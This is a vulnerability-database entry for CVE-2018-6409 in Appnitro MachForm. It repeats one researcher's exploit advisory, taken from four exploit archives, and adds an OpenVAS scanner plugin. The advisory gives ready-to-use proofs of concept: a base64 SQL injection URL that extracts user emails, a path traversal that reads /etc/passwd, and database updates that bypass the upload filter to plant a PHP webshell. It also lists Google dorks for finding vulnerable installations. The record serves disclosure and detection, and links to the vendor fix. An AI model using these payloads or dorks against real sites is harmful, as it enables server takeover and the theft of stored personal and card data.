ID CVE-2018-6409 Type cve Reporter cve@mitre.org Modified 2018-06-29T17:47:00
Description
An issue was discovered in Appnitro MachForm before 4.2.3. The module in charge of serving stored files gets the path from the database. Modifying the name of the file to serve on the corresponding ap_form table leads to a path traversal vulnerability via the download.php q parameter.
{"packetstorm": [{"lastseen": "2018-05-31T09:29:47", "description": "", "published": "2018-05-28T00:00:00", "type": "packetstorm", "title": "Appnitro MachForm SQL Injection / Traversal / File Upload", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-6409", "CVE-2018-6410", "CVE-2018-6411"], "modified": "2018-05-28T00:00:00", "id": "PACKETSTORM:147948", "href": "https://packetstormsecurity.com/files/147948/Appnitro-MachForm-SQL-Injection-Traversal-File-Upload.html", "sourceData": "`Vendor: Appnitro \nProduct webpage: https://www.machform.com/ \nFull-Disclose: https://metalamin.github.io/MachForm-not-0-day-EN/ \nFix: https://www.machform.com/blog-machform-423-security-release/ \n \nAuthor: Amine Taouirsa \n@metalamin \n \nGoogle dork examples: \n---------------------- \n\"machform\" inurl:\"view.php\" \n\"machform\" inurl:\"embed.php\" \n \nSummary: \n--------- \nThe form creation platform MachForm from Appnitro is subject to SQL \ninjections that lead to path traversal and arbitrary file upload. \n \nThe application is widely deployed and with some google dorks itas possible \nto find various webpages storing sensitive data as credit card numbers with \ncorresponding security codes. Also, the arbitrary file upload can let an \nattacker get control of the server by uploading a WebShell. \n \n[1] SQL injection (CVE-2018-6410): \n------------------------- \n \n[1.1] Description: \nThe software is subject to SQL injections in the adownload.phpa file. \n \n[1.2] Parameters and statement: \nThis SQLi can be found on the parameter aqa which a base64 encoded value \nfor the following parameters: \n \n$form_id = $params['form_id']; \n$id = $params['id']; \n$field_name = $params['el']; \n$file_hash = $params['hash']; \n \n \nSo the injectable parameters are aela and aform_ida obtaining error-based, \nstacked queries and time-based blind SQL injections. This is due to the \nfollowing vulnerable statement: \n \n$query = \"select {$field_name} from `\".MF_TABLE_PREFIX.\"form_{$form_id}` \nwhere id=?\"; \n \n \n[1.3] POC \nProof of concept to get the first user mail: \nhttp:// [URL] / [Machform_folder] \n/download.php?q=ZWw9IChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoMHgyMDIwLChTRUxFQ1QgTUlEKCh1c2VyX2VtYWlsKSwxLDUwKSBGUk9NIGFwX3VzZXJzIE9SREVSIEJZIHVzZXJfaWQgTElNSVQgMCwxKSwweDIwMjAsRkxPT1IoUkFORCgwKSoyKSl4IEZST00gSU5GT1JNQVRJT05fU0NIRU1BLkNIQVJBQ1RFUl9TRVRTIEdST1VQIEJZIHgpYSkgOyZpZD0xJmhhc2g9MSZmb3JtX2lkPTE= \n \nWhich is the base64 encoding for: \nel= (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x2020,(SELECT \nMID((user_email),1,50) FROM ap_users ORDER BY user_id LIMIT \n0,1),0x2020,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP \nBY x)a) ;&id=1&hash=1&form_id=1 \n \n \n[2] Path traversal (CVE-2018-6409): \n----------------------------------- \n \n[2.1] Descrition \ndownload.phpa is used to serve stored files from the forms answers. \nModifying the name of the file to serve on the corresponding ap_form table \nleads to a path traversal vulnerability. \n \n[2.2] POC \nFirst we need to change the name for the element on the form: \nupdate ap_form_58009 set \nelement_4=\"../../../../../../../../../../../../../../../../etc/passwd\" \nwhere id=1; \n \nNow in order to be able to download it, we need to access: \nhttp:// [URL] / [Machform_folder] \n/download.php?q=ZWw9NCZpZD0xJmhhc2g9NDAyYmEwMjMwZDZmNDRhMmRlNTkwYWMxMTEwN2E0NTgmZm9ybV9pZD01ODAwOQo= \n \nWhich is the base64 encoding for; \nel=4&id=1&hash=402ba0230d6f44a2de590ac11107a458&form_id=58009 \n \nNote that hash is the MD5 of the corresponding filename: \nmd5(\"../../../../../../../../../../../../../../../../etc/passwd\") = \n402ba0230d6f44a2de590ac11107a458 \n \n[3] Bypass file upload filter (CVE-2018-6411): \n---------------------------------------------- \n \nWhen the form is set to filter a blacklist, it automatically add dangerous \nextensions to the filters. \nIf the filter is set to a whitelist, the dangerous extensions can be \nbypassed. \n \nThis can be done directly on the database via SQLi \nupdate ap_form_elements set \nelement_file_type_list=\"php\",element_file_block_or_allow=\"a\" where \nform_id=58009 and element_id=4; \n \nOnce uploaded the file can be found and executed in the following URL: \nhttp:// [URL] / [Machform_folder] /data/form_58009/files/ [filename] \n \nThe filename can be found in the database \nSELECT element_4 FROM ap_form_58009 WHERE id=1; \n \n-- \n \nAmine Taouirsa \n \nHacking | Head of Hacking Research \n \namine_taouirsa@innotecsystem.com \n \nT. +34 917 281 504 | M. +34 644 486 240 \n \nAvda. Llano Castellano, 43 28034 MADRID \n \n \n<http://www.innotecsystem.com/> \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/147948/appnitromachform-sqlshelltraversal.txt"}], "exploitdb": [{"lastseen": "2018-05-30T18:08:05", "description": "MachForm < 4.2.3 - SQL Injection / Path Traversal / Upload Bypass. CVE-2018-6409,CVE-2018-6410,CVE-2018-6411. Webapps exploit for PHP platform. Tags: SQL ...", "published": "2018-05-30T00:00:00", "type": "exploitdb", "title": "MachForm < 4.2.3 - SQL Injection / Path Traversal / Upload Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-6409", "CVE-2018-6410", "CVE-2018-6411"], "modified": "2018-05-30T00:00:00", "id": "EDB-ID:44804", "href": "https://www.exploit-db.com/exploits/44804/", "sourceData": "Vendor: Appnitro\r\nProduct webpage: https://www.machform.com/\r\nFull-Disclose: https://metalamin.github.io/MachForm-not-0-day-EN/\r\nFix: https://www.machform.com/blog-machform-423-security-release/\r\n\r\nAuthor: Amine Taouirsa\r\nTwitter: @metalamin\r\n\r\nGoogle dork examples:\r\n----------------------\r\n\"machform\" inurl:\"view.php\"\r\n\"machform\" inurl:\"embed.php\"\r\n\r\nSummary:\r\n---------\r\nThe form creation platform MachForm from Appnitro is subject to SQL\r\ninjections that lead to path traversal and arbitrary file upload.\r\n\r\nThe application is widely deployed and with some google dorks it\u2019s possible\r\nto find various webpages storing sensitive data as credit card numbers with\r\ncorresponding security codes. Also, the arbitrary file upload can let an\r\nattacker get control of the server by uploading a WebShell.\r\n\r\n[1] SQL injection (CVE-2018-6410):\r\n-------------------------\r\n\r\n[1.1] Description:\r\nThe software is subject to SQL injections in the \u2018download.php\u2019 file.\r\n\r\n[1.2] Parameters and statement:\r\nThis SQLi can be found on the parameter \u2018q\u2019 which a base64 encoded value\r\nfor the following parameters:\r\n\r\n $form_id = $params['form_id'];\r\n $id = $params['id'];\r\n $field_name = $params['el'];\r\n $file_hash = $params['hash'];\r\n\r\n\r\nSo the injectable parameters are \u2018el\u2019 and \u2018form_id\u2019 obtaining error-based,\r\nstacked queries and time-based blind SQL injections. This is due to the\r\nfollowing vulnerable statement:\r\n\r\n $query = \"select {$field_name} from `\".MF_TABLE_PREFIX.\"form_{$form_id}`\r\nwhere id=?\";\r\n\r\n\r\n[1.3] POC\r\nProof of concept to get the first user mail:\r\n http:// [URL] / [Machform_folder] /download.php?q=\r\nZWw9IChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoMHgy\r\nMDIwLChTRUxFQ1QgTUlEKCh1c2VyX2VtYWlsKSwxLDUwKSBGUk9NIGFwX3Vz\r\nZXJzIE9SREVSIEJZIHVzZXJfaWQgTElNSVQgMCwxKSwweDIwMjAsRkxPT1Io\r\nUkFORCgwKSoyKSl4IEZST00gSU5GT1JNQVRJT05fU0NIRU1BLkNIQVJBQ1RF\r\nUl9TRVRTIEdST1VQIEJZIHgpYSkgOyZpZD0xJmhhc2g9MSZmb3JtX2lkPTE=\r\n\r\nWhich is the base64 encoding for:\r\n el= (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x2020,(SELECT\r\nMID((user_email),1,50) FROM ap_users ORDER BY user_id LIMIT\r\n0,1),0x2020,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP\r\nBY x)a) ;&id=1&hash=1&form_id=1\r\n\r\n\r\n[2] Path traversal (CVE-2018-6409):\r\n-----------------------------------\r\n\r\n[2.1] Descrition\r\ndownload.php\u2019 is used to serve stored files from the forms answers.\r\nModifying the name of the file to serve on the corresponding ap_form table\r\nleads to a path traversal vulnerability.\r\n\r\n[2.2] POC\r\nFirst we need to change the name for the element on the form:\r\nupdate ap_form_58009 set element_4=\"../../../../../../.\r\n./../../../../../../../../../etc/passwd\" where id=1;\r\n\r\nNow in order to be able to download it, we need to access:\r\n http:// [URL] / [Machform_folder] /download.php?q=\r\nZWw9NCZpZD0xJmhhc2g9NDAyYmEwMjMwZDZmNDRhMmRlNTkwYWMxMTEwN2E0\r\nNTgmZm9ybV9pZD01ODAwOQo=\r\n\r\nWhich is the base64 encoding for;\r\n el=4&id=1&hash=402ba0230d6f44a2de590ac11107a458&form_id=58009\r\n\r\nNote that hash is the MD5 of the corresponding filename:\r\n md5(\"../../../../../../../../../../../../../../../../etc/passwd\") =\r\n402ba0230d6f44a2de590ac11107a458\r\n\r\n[3] Bypass file upload filter (CVE-2018-6411):\r\n----------------------------------------------\r\n\r\nWhen the form is set to filter a blacklist, it automatically add dangerous\r\nextensions to the filters.\r\nIf the filter is set to a whitelist, the dangerous extensions can be\r\nbypassed.\r\n\r\nThis can be done directly on the database via SQLi\r\nupdate ap_form_elements set element_file_type_list=\"php\",\r\nelement_file_block_or_allow=\"a\" where form_id=58009 and element_id=4;\r\n\r\nOnce uploaded the file can be found and executed in the following URL:\r\nhttp:// [URL] / [Machform_folder] /data/form_58009/files/ [filename]\r\n\r\nThe filename can be found in the database\r\nSELECT element_4 FROM ap_form_58009 WHERE id=1;", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44804/"}], "zdt": [{"lastseen": "2018-05-31T01:51:33", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2018-05-30T00:00:00", "title": "MachForm < 4.2.3 - SQL Injection / Path Traversal / Upload Bypass Vulnerabilities", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-6409", "CVE-2018-6410", "CVE-2018-6411"], "modified": "2018-05-30T00:00:00", "id": "1337DAY-ID-30504", "href": "https://0day.today/exploit/description/30504", "sourceData": "Vendor: Appnitro\r\nProduct webpage: https://www.machform.com/\r\nFull-Disclose: https://metalamin.github.io/MachForm-not-0-day-EN/\r\nFix: https://www.machform.com/blog-machform-423-security-release/\r\n \r\nAuthor: Amine Taouirsa\r\nTwitter: @metalamin\r\n \r\nGoogle dork examples:\r\n----------------------\r\n\"machform\" inurl:\"view.php\"\r\n\"machform\" inurl:\"embed.php\"\r\n \r\nSummary:\r\n---------\r\nThe form creation platform MachForm from Appnitro is subject to SQL\r\ninjections that lead to path traversal and arbitrary file upload.\r\n \r\nThe application is widely deployed and with some google dorks it\u2019s possible\r\nto find various webpages storing sensitive data as credit card numbers with\r\ncorresponding security codes. Also, the arbitrary file upload can let an\r\nattacker get control of the server by uploading a WebShell.\r\n \r\n[1] SQL injection (CVE-2018-6410):\r\n-------------------------\r\n \r\n[1.1] Description:\r\nThe software is subject to SQL injections in the \u2018download.php\u2019 file.\r\n \r\n[1.2] Parameters and statement:\r\nThis SQLi can be found on the parameter \u2018q\u2019 which a base64 encoded value\r\nfor the following parameters:\r\n \r\n $form_id = $params['form_id'];\r\n $id = $params['id'];\r\n $field_name = $params['el'];\r\n $file_hash = $params['hash'];\r\n \r\n \r\nSo the injectable parameters are \u2018el\u2019 and \u2018form_id\u2019 obtaining error-based,\r\nstacked queries and time-based blind SQL injections. This is due to the\r\nfollowing vulnerable statement:\r\n \r\n $query = \"select {$field_name} from `\".MF_TABLE_PREFIX.\"form_{$form_id}`\r\nwhere id=?\";\r\n \r\n \r\n[1.3] POC\r\nProof of concept to get the first user mail:\r\n http:// [URL] / [Machform_folder] /download.php?q=\r\nZWw9IChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoMHgy\r\nMDIwLChTRUxFQ1QgTUlEKCh1c2VyX2VtYWlsKSwxLDUwKSBGUk9NIGFwX3Vz\r\nZXJzIE9SREVSIEJZIHVzZXJfaWQgTElNSVQgMCwxKSwweDIwMjAsRkxPT1Io\r\nUkFORCgwKSoyKSl4IEZST00gSU5GT1JNQVRJT05fU0NIRU1BLkNIQVJBQ1RF\r\nUl9TRVRTIEdST1VQIEJZIHgpYSkgOyZpZD0xJmhhc2g9MSZmb3JtX2lkPTE=\r\n \r\nWhich is the base64 encoding for:\r\n el= (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x2020,(SELECT\r\nMID((user_email),1,50) FROM ap_users ORDER BY user_id LIMIT\r\n0,1),0x2020,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP\r\nBY x)a) ;&id=1&hash=1&form_id=1\r\n \r\n \r\n[2] Path traversal (CVE-2018-6409):\r\n-----------------------------------\r\n \r\n[2.1] Descrition\r\ndownload.php\u2019 is used to serve stored files from the forms answers.\r\nModifying the name of the file to serve on the corresponding ap_form table\r\nleads to a path traversal vulnerability.\r\n \r\n[2.2] POC\r\nFirst we need to change the name for the element on the form:\r\nupdate ap_form_58009 set element_4=\"../../../../../../.\r\n./../../../../../../../../../etc/passwd\" where id=1;\r\n \r\nNow in order to be able to download it, we need to access:\r\n http:// [URL] / [Machform_folder] /download.php?q=\r\nZWw9NCZpZD0xJmhhc2g9NDAyYmEwMjMwZDZmNDRhMmRlNTkwYWMxMTEwN2E0\r\nNTgmZm9ybV9pZD01ODAwOQo=\r\n \r\nWhich is the base64 encoding for;\r\n el=4&id=1&hash=402ba0230d6f44a2de590ac11107a458&form_id=58009\r\n \r\nNote that hash is the MD5 of the corresponding filename:\r\n md5(\"../../../../../../../../../../../../../../../../etc/passwd\") =\r\n402ba0230d6f44a2de590ac11107a458\r\n \r\n[3] Bypass file upload filter (CVE-2018-6411):\r\n----------------------------------------------\r\n \r\nWhen the form is set to filter a blacklist, it automatically add dangerous\r\nextensions to the filters.\r\nIf the filter is set to a whitelist, the dangerous extensions can be\r\nbypassed.\r\n \r\nThis can be done directly on the database via SQLi\r\nupdate ap_form_elements set element_file_type_list=\"php\",\r\nelement_file_block_or_allow=\"a\" where form_id=58009 and element_id=4;\r\n \r\nOnce uploaded the file can be found and executed in the following URL:\r\nhttp:// [URL] / [Machform_folder] /data/form_58009/files/ [filename]\r\n \r\nThe filename can be found in the database\r\nSELECT element_4 FROM ap_form_58009 WHERE id=1;\n\n# 0day.today [2018-05-31] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30504"}], "openvas": [{"lastseen": "2019-05-29T18:32:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-6409", "CVE-2018-6410", "CVE-2018-6411"], "description": "Appnitro MachForm is prone to multiple vulnerabilities.", "modified": "2018-11-16T00:00:00", "published": "2018-05-31T00:00:00", "id": "OPENVAS:1361412562310141126", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141126", "type": "openvas", "title": "Appnitro MachForm < 4.2.3 Multiple Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_machform_mult_vuln.nasl 12368 2018-11-16 03:53:29Z ckuersteiner $\n#\n# Appnitro MachForm < 4.2.3 Multiple Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:appnitro:machform\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141126\");\n script_version(\"$Revision: 12368 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 04:53:29 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-31 09:43:14 +0700 (Thu, 31 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2018-6409\", \"CVE-2018-6410\", \"CVE-2018-6411\");\n\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Appnitro MachForm < 4.2.3 Multiple Vulnerabilities\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_appnitro_machform_detect.nasl\");\n script_mandatory_keys(\"appnitro_machform/installed\");\n\n script_tag(name:\"summary\", value:\"Appnitro MachForm is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"insight\", value:\"Appnitro MachForm is prone to multiple vulnerabilities:\n\n - Path traversal (CVE-2018-6409)\n\n - SQL-Injection (CVE-2018-6410)\n\n - Bypass of file upload filter (CVE-2018-6411)\");\n\n script_tag(name:\"vuldetect\", value:\"Tries to upload a PHP file and checks if phpinfo() can be exectuted.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.2.3 or later\");\n\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/44794/\");\n script_xref(name:\"URL\", value:\"https://metalamin.github.io/MachForm-not-0-day-EN/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nurl = dir + '/download.php?q=ZWw9IChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoMHgyMDIwLChTRUxFQ1QgTUlEKCh1c2VyX2VtYWlsKSwxLDUwKSBGUk9NIGFwX3VzZXJzIE9SREVSIEJZIHVzZXJfaWQgTElNSVQgMCwxKSwweDIwMjAsRkxPT1IoUkFORCgwKSoyKSl4IEZST00gSU5GT1JNQVRJT05fU0NIRU1BLkNIQVJBQ1RFUl9TRVRTIEdST1VQIEJZIHgpYSkgOyZpZD0xJmhhc2g9MSZmb3JtX2lkPTE=';\n\nreq = http_get(port: port, item: url);\nres = http_keepalive_send_recv(port: port, data: req, bodyonly: TRUE);\n\nif (\"Integrity constraint violation\" >< res) {\n report = 'The error message retrieved indicates that an SQL Injection was possible.\\n\\nResponse:\\n' +\n res;\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:29", "description": "\nMachForm 4.2.3 - SQL Injection Path Traversal Upload Bypass", "edition": 1, "published": "2018-05-30T00:00:00", "title": "MachForm 4.2.3 - SQL Injection Path Traversal Upload Bypass", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-6409", "CVE-2018-6410", "CVE-2018-6411"], "modified": "2018-05-30T00:00:00", "id": "EXPLOITPACK:269096FC77F894EFD61D82DDB94BF254", "href": "", "sourceData": "Vendor: Appnitro\nProduct webpage: https://www.machform.com/\nFull-Disclose: https://metalamin.github.io/MachForm-not-0-day-EN/\nFix: https://www.machform.com/blog-machform-423-security-release/\n\nAuthor: Amine Taouirsa\nTwitter: @metalamin\n\nGoogle dork examples:\n----------------------\n\"machform\" inurl:\"view.php\"\n\"machform\" inurl:\"embed.php\"\n\nSummary:\n---------\nThe form creation platform MachForm from Appnitro is subject to SQL\ninjections that lead to path traversal and arbitrary file upload.\n\nThe application is widely deployed and with some google dorks it\u2019s possible\nto find various webpages storing sensitive data as credit card numbers with\ncorresponding security codes. Also, the arbitrary file upload can let an\nattacker get control of the server by uploading a WebShell.\n\n[1] SQL injection (CVE-2018-6410):\n-------------------------\n\n[1.1] Description:\nThe software is subject to SQL injections in the \u2018download.php\u2019 file.\n\n[1.2] Parameters and statement:\nThis SQLi can be found on the parameter \u2018q\u2019 which a base64 encoded value\nfor the following parameters:\n\n $form_id = $params['form_id'];\n $id = $params['id'];\n $field_name = $params['el'];\n $file_hash = $params['hash'];\n\n\nSo the injectable parameters are \u2018el\u2019 and \u2018form_id\u2019 obtaining error-based,\nstacked queries and time-based blind SQL injections. This is due to the\nfollowing vulnerable statement:\n\n $query = \"select {$field_name} from `\".MF_TABLE_PREFIX.\"form_{$form_id}`\nwhere id=?\";\n\n\n[1.3] POC\nProof of concept to get the first user mail:\n http:// [URL] / [Machform_folder] /download.php?q=\nZWw9IChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoMHgy\nMDIwLChTRUxFQ1QgTUlEKCh1c2VyX2VtYWlsKSwxLDUwKSBGUk9NIGFwX3Vz\nZXJzIE9SREVSIEJZIHVzZXJfaWQgTElNSVQgMCwxKSwweDIwMjAsRkxPT1Io\nUkFORCgwKSoyKSl4IEZST00gSU5GT1JNQVRJT05fU0NIRU1BLkNIQVJBQ1RF\nUl9TRVRTIEdST1VQIEJZIHgpYSkgOyZpZD0xJmhhc2g9MSZmb3JtX2lkPTE=\n\nWhich is the base64 encoding for:\n el= (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x2020,(SELECT\nMID((user_email),1,50) FROM ap_users ORDER BY user_id LIMIT\n0,1),0x2020,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP\nBY x)a) ;&id=1&hash=1&form_id=1\n\n\n[2] Path traversal (CVE-2018-6409):\n-----------------------------------\n\n[2.1] Descrition\ndownload.php\u2019 is used to serve stored files from the forms answers.\nModifying the name of the file to serve on the corresponding ap_form table\nleads to a path traversal vulnerability.\n\n[2.2] POC\nFirst we need to change the name for the element on the form:\nupdate ap_form_58009 set element_4=\"../../../../../../.\n./../../../../../../../../../etc/passwd\" where id=1;\n\nNow in order to be able to download it, we need to access:\n http:// [URL] / [Machform_folder] /download.php?q=\nZWw9NCZpZD0xJmhhc2g9NDAyYmEwMjMwZDZmNDRhMmRlNTkwYWMxMTEwN2E0\nNTgmZm9ybV9pZD01ODAwOQo=\n\nWhich is the base64 encoding for;\n el=4&id=1&hash=402ba0230d6f44a2de590ac11107a458&form_id=58009\n\nNote that hash is the MD5 of the corresponding filename:\n md5(\"../../../../../../../../../../../../../../../../etc/passwd\") =\n402ba0230d6f44a2de590ac11107a458\n\n[3] Bypass file upload filter (CVE-2018-6411):\n----------------------------------------------\n\nWhen the form is set to filter a blacklist, it automatically add dangerous\nextensions to the filters.\nIf the filter is set to a whitelist, the dangerous extensions can be\nbypassed.\n\nThis can be done directly on the database via SQLi\nupdate ap_form_elements set element_file_type_list=\"php\",\nelement_file_block_or_allow=\"a\" where form_id=58009 and element_id=4;\n\nOnce uploaded the file can be found and executed in the following URL:\nhttp:// [URL] / [Machform_folder] /data/form_58009/files/ [filename]\n\nThe filename can be found in the database\nSELECT element_4 FROM ap_form_58009 WHERE id=1;", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
